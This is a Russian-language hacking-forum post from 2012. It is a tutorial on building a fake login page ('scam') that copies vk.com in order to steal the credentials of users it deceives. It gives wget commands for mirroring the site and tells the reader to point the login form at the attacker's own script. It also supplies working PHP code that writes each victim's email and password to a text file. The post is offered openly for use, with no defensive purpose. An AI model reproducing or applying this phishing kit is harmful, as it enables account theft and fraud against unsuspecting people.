|
Взлом и Софт Обсуждение методик взлома ICQ, E-mail, Dedicated Servers, сайтов и прочего. Уязвимости. Актуальный софт для взлома. Brute. |
|
Опции темы | Опции просмотра |
|
|
26.04.2012, 17:20 | #1 |
Залётный
Регистрация: 26.04.2012
Сообщений: 2
|
Создание простой фейковой страницы (scam) с записью данных в файл
Фейковые страницы, они же scam'ы, создаются с целью ввести жертву в заблуждение, чтобы та сама ввела свой логин и пароль на чужом сайте.
Фейковые страницы бывают разные по сложности, но если она не похожа на оригинал, то затея заранее бессмысленна. Поэтому даже самый простейший scam не должен отличаться от оригинала. Проще всего создать полную копию страницы можно с помощью программы wget. Данная программа есть по умолчанию практически во всех linux дистрибутивах (возможно в mac тоже), но вот в windows её нет. Но её порт можно скачать [Ссылки могут видеть только зарегистрированные пользователи. ]. Порт для windows весьма корявый, но работает. После установки следует перейти к exe файлу в командной строке (например: cd C:\Programm Files\GnuWin32\bin), а уже потом можно работать с wget, как и в linux. В качестве примера рассмотрим создание фишинговой страницы vk.com. Если нужно скопировать всего одну страницу, то следует ввести команду: Код:
wget –k vk.com Очень важный ключ «-k». Он позволяет не просто получить html вариант страницы, но и преобразовать все ссылки так, чтобы прогружались стили и картинки. Если есть желание, чтобы все основные стили, картинки и библиотеки грузились именно с вашего хостинга, то можно включить рекурсивную загрузку с глубиной в 1 шаг: Код:
wget -r -l1 -k vk.com Код:
wget -mk vk.com Когда страница/сайт скачен, то можно приступать к редактированию, чтобы логин и пароль записывались в файл. В index.html будут примерно такие строки (проще всего искать по запросу login) Нужно заменить адрес, куда уходят данные об авторизации на наш. Значит, меняем [Ссылки могут видеть только зарегистрированные пользователи. ] на [Ссылки могут видеть только зарегистрированные пользователи. ]. Теперь нужно создать сам файл login.php Для vk.com идеально подходит такой вариант: Код:
<? $Login = $_POST['email']; $Password = $_POST['pass']; $filename = "base.txt"; $file = fopen($filename, "a+" ); fputs ($file, 'login_name: '.$Login."\n"); fputs ($file, 'login_password: '.$Password."\n"); fputs ($file, '------------------'."\n"); fclose($file); ?> Просто нужно посмотреть значение 'name=' и подставить их в файл login.php Остаётся только создать файл base.txt и дать права на запись (Обязательно!! Почему-то про это часто забывают). Простейшая фейковая страница готова. Она ничуть не отличается по дизайну, зато отлично запоминает данные, которые на ней вводят. Позже будут рассмотрены более сложные примеры фейковых страниц. Например, чтобы данные проверялись на валидность, была возможность отправлять результаты на почту и тому подобное. Но описание того, как скачать полную копию страницы, будет только в этой статье. |